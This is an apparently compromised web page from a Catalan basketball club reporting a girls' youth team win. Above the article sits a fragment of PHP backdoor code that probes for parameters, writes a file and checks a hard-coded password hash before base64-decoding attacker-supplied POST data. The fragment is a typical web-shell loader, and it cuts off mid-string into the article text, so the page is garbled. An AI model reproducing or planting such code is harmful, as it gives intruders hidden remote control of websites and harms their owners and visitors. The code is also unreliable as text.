function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L’Infantil femení Lila incrementa l’encert exterior per a guanyar amb solvència al Sant Pau Bàsquet (64-22) - Tgn Bàsquet Club -

L’Infantil femení Lila incrementa l’encert exterior per a guanyar amb solvència al Sant Pau Bàsquet (64-22)

Updated: maig 27, 2021

L’infantil femení Lila minimitza els errors tant defensius com ofensius i s’emporta el triomf vers el Sant Pau. Les locals inicien el matx amb una intensitat defensiva que les va permetre obrir el marcador amb un parcial molt favorable de 16-2. Les grogues, però, no van abaixar el cap, i van aconseguir empatar l’anotació del parcial anterior al descans. Les moltes recuperacions acabades en bàsquets gràcies a una defensa asfixiant i el bon balanç defensiu, feien accentuar les diferències en el marcador. La segona part del partit va ser semblant a l’inici d’aquest, permetent una victòria merescuda a les locals, que a més, recuperaven a dues jugadores lesionades en el darrer matx disputat.